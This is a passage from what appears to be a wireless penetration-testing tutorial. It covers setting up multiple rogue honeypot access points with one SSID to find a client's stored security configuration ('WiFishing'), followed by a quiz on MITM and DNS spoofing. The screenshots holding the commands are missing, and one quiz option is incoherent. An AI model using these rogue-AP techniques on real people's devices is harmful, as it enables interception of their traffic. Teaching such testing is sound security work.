Time for action – deauthentication attacks on the client

  1. We will assume that the wireless client has a network Wireless Lab configured on it, and it actively sends Probe Requests for this network, when it is not connected to any access point. In order to find the security configuration of this network, we will need to create multiple access points. For our discussion, we will assume that the client profile is an open network, WEP protected, WPA-PSK, or WPA2-PSK. This means we will have to create four access points. To do this, we will first create four virtual interfaces—mon0 to mon3, using the airmon-ng start wlan0 command multiple times:
    Time for action – deauthentication attacks on the client
  2. You can view all these newly created interfaces using the ifconfig –a command:
    Time for action – deauthentication attacks on the client
  3. Now we will create the open AP on mon0:
    Time for action – deauthentication attacks on the client
  4. Let's create the WEP protected AP on mon1:
    Time for action – deauthentication attacks on the client
  5. The WPA-PSK AP will be on mon2:
    Time for action – deauthentication attacks on the client
  6. WPA2-PSK AP will be on mon3:
    Time for action – deauthentication attacks on the client
  7. We can run airodump-ng on the same channel to ensure that all four access points are up and running, as shown in the following screenshot:
    Time for action – deauthentication attacks on the client
  8. Now let's switch the Wi-Fi on on the roaming client. Depending on which Wireless Lab network you connected it to previously, it will connect to that security configuration. In my case, it connects to the WPA-PSK network, as shown in the following screenshot:
    Time for action – deauthentication attacks on the client

What just happened?

We created multiple Honeypots with the same SSID but different security configurations. Depending on which configuration the client had stored for the "Wireless Lab" network, it connected to the appropriate one.

This technique can come in handy as, if you are doing a penetration test, you won't know which security configurations the client has on its laptop. This allows you to find the appropriate one by setting a bait for the client. This technique is also called WiFishing.

Have a go hero – baiting clients

Create different security configurations on the client for the same SSID, and check whether your set of Honeypots is able to detect them.

It is important to note that many Wi-Fi clients might not actively probe for networks they have stored in their profile. It might not be possible to detect these networks using the technique we discussed here.

Pop quiz – advanced WLAN attacks

Q1. In an MITM attack, who is in the middle?

  1. The access point.
  2. The attacker.
  3. The victim.
  4. None of the above.

Q2. Dnsspoof:

  1. Spoofs DNS requests.
  2. Spoofs DNS responses.
  3. Needs to run on the DNS server.
  4. Needs to run on the access point.

Q3. A wireless MITM attack can be orchestrated:

  1. On all wireless clients at the same time.
  2. Only one channel at a time.
  3. On any SSID.
  4. Both 3 and 4.

Q4. Which is the interface closest to the victim in our MITM setup?

  1. At0.
  2. Eth0.
  3. Br0.
  4. En0.
..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset